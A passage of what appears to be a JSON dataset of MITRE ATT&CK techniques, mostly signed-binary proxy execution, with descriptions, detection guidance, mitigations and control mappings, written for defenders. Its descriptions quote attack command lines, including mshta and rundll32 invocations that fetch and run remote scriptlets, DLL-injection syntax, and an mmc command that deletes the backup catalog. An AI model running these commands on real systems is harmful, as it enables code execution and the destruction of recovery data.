CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1218.002", + "name": "Signed Binary Proxy Execution: Control Panel", + "url": "https://attack.mitre.org/techniques/T1218/002", + "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)", + "detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1218.003", + "name": "Signed Binary Proxy Execution: CMSTP", + "url": "https://attack.mitre.org/techniques/T1218/003", + "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", + "detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1218.004", + "name": "Signed Binary Proxy Execution: InstallUtil", + "url": "https://attack.mitre.org/techniques/T1218/004", + "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", + "detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1218.005", + "name": "Signed Binary Proxy Execution: Mshta", + "url": "https://attack.mitre.org/techniques/T1218/005", + "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", + "detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1218.007", + "name": "Signed Binary Proxy Execution: Msiexec", + "url": "https://attack.mitre.org/techniques/T1218/007", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)", + "detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1218.008", + "name": "Signed Binary Proxy Execution: Odbcconf", + "url": "https://attack.mitre.org/techniques/T1218/008", + "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n", + "detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1218.009", + "name": "Signed Binary Proxy Execution: Regsvcs/Regasm", + "url": "https://attack.mitre.org/techniques/T1218/009", + "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", + "detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1218.010", + "name": "Signed Binary Proxy Execution: Regsvr32", + "url": "https://attack.mitre.org/techniques/T1218/010", + "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)", + "detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)", + "mitigations": [ + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + } + ] + }, + { + "tid": "T1218.011", + "name": "Signed Binary Proxy Execution: Rundll32", + "url": "https://attack.mitre.org/techniques/T1218/011", + "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)", + "detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.", + "mitigations": [ + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + } + ] + }, + { + "tid": "T1218.012", + "name": "Signed Binary Proxy Execution: Verclsid", + "url": "https://attack.mitre.org/techniques/T1218/012", + "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ", + "detection": "Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1218.013", + "name": "Signed Binary Proxy Execution: Mavinject", + "url": "https://attack.mitre.org/techniques/T1218/013", + "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)", + "detection": "Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.\n\nAdversaries may rename abusable binaries to evade detections, but the argument INJECTRUNNING is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1218.014", + "name": "Signed Binary Proxy Execution: MMC", + "url": "https://attack.mitre.org/techniques/T1218/014", + "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)", + "detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 2.9982380952380954, + "adjusted_score": 2.9982380952380954, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.5,2.7,4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,10.5,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CM-11", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "RA-5", + "SI-10", + "SI-16", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1219", + "name": "Remote Access Software", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)", + "url": "https://attack.mitre.org/techniques/T1219", + "tactics": [ + "Command And Control" + ], + "detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 1.3061613287295237, + "adjusted_score": 1.3061613287295237, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.5,4.2,4.4,7.6,9.3,13.3,13.4,13.8,18.2,18.3" + ], + "nist_controls": [ + "AC-17", + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-10", + "SI-15", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1220", + "name": "XSL Script Processing", + "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab 